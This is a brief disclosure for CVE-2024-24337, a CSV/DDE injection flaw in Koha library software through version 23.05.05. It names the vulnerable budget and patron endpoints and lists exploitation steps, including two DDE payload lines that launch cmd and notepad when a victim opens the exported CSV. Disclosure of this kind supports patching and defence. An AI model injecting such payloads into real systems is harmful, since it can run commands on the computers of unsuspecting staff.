CVE-2024-24337
Product detail ⌗
A multiple CSV Injection vulnerability in the '/members/moremember.pl' and '/admin/aqbudgets.pl' endpoints within Koha Library Management System version <= 23.05.05 allows malicious staff users to inject DDE commands into input fields via the 'Budget' and 'Patrons Member' components. When a victim exports this data as a CSV file and opens the file containing the un-sanitized DDE command, the code executes, potentially launching programs on the victim's endpoint if macro security is disabled.
Prerequisite ⌗
Install Koha from official Koha Github repository
GitHub page
Installed Koha version 23.05.05
Exploitation ⌗
1. Insert DDE command below into affected field
DDE ("cmd";"/C cmd";"!A0")A0
DDE ("cmd";"/C notepad";"!A0")A0
2. Export data as CSV
3. Victim open CSV with a macro setting disabled
DDE command was un-sanitized